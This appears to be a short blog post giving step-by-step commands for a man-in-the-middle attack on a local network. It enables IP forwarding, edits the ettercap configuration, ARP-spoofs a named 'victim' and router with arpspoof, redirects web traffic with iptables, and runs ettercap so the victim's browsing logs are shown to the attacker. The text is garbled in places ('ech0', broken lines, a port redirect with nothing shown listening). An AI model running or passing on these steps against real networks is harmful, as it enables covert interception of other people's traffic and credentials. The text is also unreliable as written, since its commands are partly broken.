THE FIRST
THING WE NEED
TO DO HERE
IS TO PORT
FORWARDING
·
OPEN A
NEW TERMINAL AND
TYPE : - ech0 1
>/proc/sys/net/ipv4/ip_forward > ENTER.
NOW WE
NEED TO CONFIGURE
THE ETTERCAP CONFIGURATION
FILE
·
TYPE
: kate /etc/etter.conf > PRESS
ENTER > NOW
MOVE DOWN TO
FIND LINUX TAB
> HERE U
HAVE TO REMOVE
THE #
SYMBOLS IN
THE IPTABLES BELOW
2 LINES SAVE
THE FILE AND EXIT.
·
IF KATE
PROGRAM IS NOT
INSTALLED, U CAN INSTALL IT
BY TYPING apt-get
install kate >
PRESS ENTER.
NOW WE
MUST ARPSPOOF THE
TARGET AND NETWORK
·
IN THE
TERMINAL TYPE :
- arpspoof
-i ur ( INTERFACE
NAME ) -t ( VICTIM IP ) (
ROUTER IP ) >
PRESS ENTER.
EX : - arpspoof -i eth0
-t 192.168.1.4 192.168.15.1
·
OPEN A
NEW TERMINAL AND
TYPE : - iptables -t
nat -A PREROUTING
-p tcp --destination-port 80
-j REDIRECT --to-port
10000 > PRESS
ENTER.
- NOW OPEN ANOTHER TERMINAL TYPE : ettercap -t -q -I eth0 > PRESS ENTER.
THAT’S
IT WHENEVER THE
VICTIM USES HIS
WEB BROWSER ALL THE
LOGS WILL BE
SHOWN TO US
THANK Q
D.B.V RUTHWIZ
No comments:
Post a Comment